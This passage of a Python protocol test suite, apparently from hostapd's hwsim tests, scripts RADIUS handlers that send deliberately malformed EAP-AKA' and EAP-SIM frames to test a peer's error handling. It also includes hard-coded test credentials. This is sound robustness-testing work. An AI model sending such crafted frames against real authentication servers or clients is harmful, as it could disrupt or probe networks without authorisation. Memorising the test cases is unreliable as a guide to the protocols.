    # frames used to exercise the peer's error handling paths.
    def aka_prime_handler(ctx, req):
        logger.info("aka_prime_handler - RX " + req.encode("hex"))
        # ctx persists across packets: 'num' counts received messages and
        # 'id' is the EAP identifier placed in the next crafted frame.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # Each case below builds a raw EAP frame with struct.pack; the
        # length field is 4 (EAP header) + 1 (EAP type) + 3 (subtype +
        # reserved) + attribute payload bytes.
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_AKA_PRIME)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with empty AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with AT_KDF_INPUT")
            return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with duplicated KDF")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 2,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        # NOTE(review): several multi-KDF cases below are sent back-to-back
        # without an intervening EAP-Failure; the peer is expected to reply
        # with a KDF re-negotiation rather than abort — confirm against the
        # peer implementation.
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with incorrect KDF selected")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with selected KDF not duplicated")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple unsupported KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 2 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - AMF separation bit not set)")
            # NOTE(review): the trailing AUTN words look like precomputed
            # values matching the hard-coded test credentials — do not
            # change without recomputing.
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 9, 10,
                               0x2fda8ef7, 0xbba518cc)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - Invalid MAC")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
                               0xd1f90322, 0x40514cb4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - Valid MAC")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0,
                               0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
                               0xd1f90322, 0x40514cb4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_KDF_INPUT length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_KDF length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with large number of KDF proposals")
            return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 12 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 253,
                               EAP_SIM_AT_KDF, 1, 252,
                               EAP_SIM_AT_KDF, 1, 251,
                               EAP_SIM_AT_KDF, 1, 250,
                               EAP_SIM_AT_KDF, 1, 249,
                               EAP_SIM_AT_KDF, 1, 248,
                               EAP_SIM_AT_KDF, 1, 247,
                               EAP_SIM_AT_KDF, 1, 246,
                               EAP_SIM_AT_KDF, 1, 245,
                               EAP_SIM_AT_KDF, 1, 244)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        # Script exhausted; no further responses.
        return None

    srv = start_radius_server(aka_prime_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted test case group; the handler
        # above advances automatically as packets arrive.
        for i in range(0, 16):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA'", identity="6555444333222111",
                           password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # NOTE(review): iteration 0 apparently does not end in an EAP
            # failure event, so only a short settle delay is used there —
            # confirm against the handler script above.
            if i in [ 0 ]:
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
    """EAP-SIM protocol tests"""
    # Scripted RADIUS EAP handler: every packet received from the peer
    # advances ctx['num'], which selects the next canned server message.
    # Most messages are deliberately malformed or unexpected EAP-SIM
    # frames used to exercise the peer's error handling paths.
    def sim_handler(ctx, req):
        logger.info("sim_handler - RX " + req.encode("hex"))
        # ctx persists across packets: 'num' counts received messages and
        # 'id' is the EAP identifier placed in the next crafted frame.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # Each case below builds a raw EAP frame with struct.pack; the
        # length field is 4 (EAP header) + 1 (EAP type) + 3 (subtype +
        # reserved) + attribute payload bytes.
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_SIM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_AUTN")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_AUTN, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AT_VERSION_LIST overflow")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_AUTS")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_AUTS, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_CHECKCODE")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_CHECKCODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_VERSION_LIST in Start")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No support version in AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request without ID type")
            return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
        # NOTE(review): the identity-request cases below are deliberately
        # sent back-to-back (ANY_ID/FULLAUTH_ID/PERMANENT_ID and their
        # duplicates) to check that the peer rejects repeated identity
        # requests — confirm expected ordering against the driver loop.
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_MAC and AT_RAND in Challenge")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_RAND in Challenge")
            return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Insufficient number of challenges in Challenge")
            return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 20 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too many challenges in Challenge")
            # AT_RAND carries four 16-octet RANDs here (length field 17 =
            # 16 words + header), more than the peer accepts.
            return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
                               ctx['id'],
                               4 + 1 + 3 + 4 + 4 * 16 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Same RAND multiple times in Challenge")
            return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
                               ctx['id'],
                               4 + 1 + 3 + 4 + 3 * 16 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
                               0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but no MAC")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but invalid MAC value")
            return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
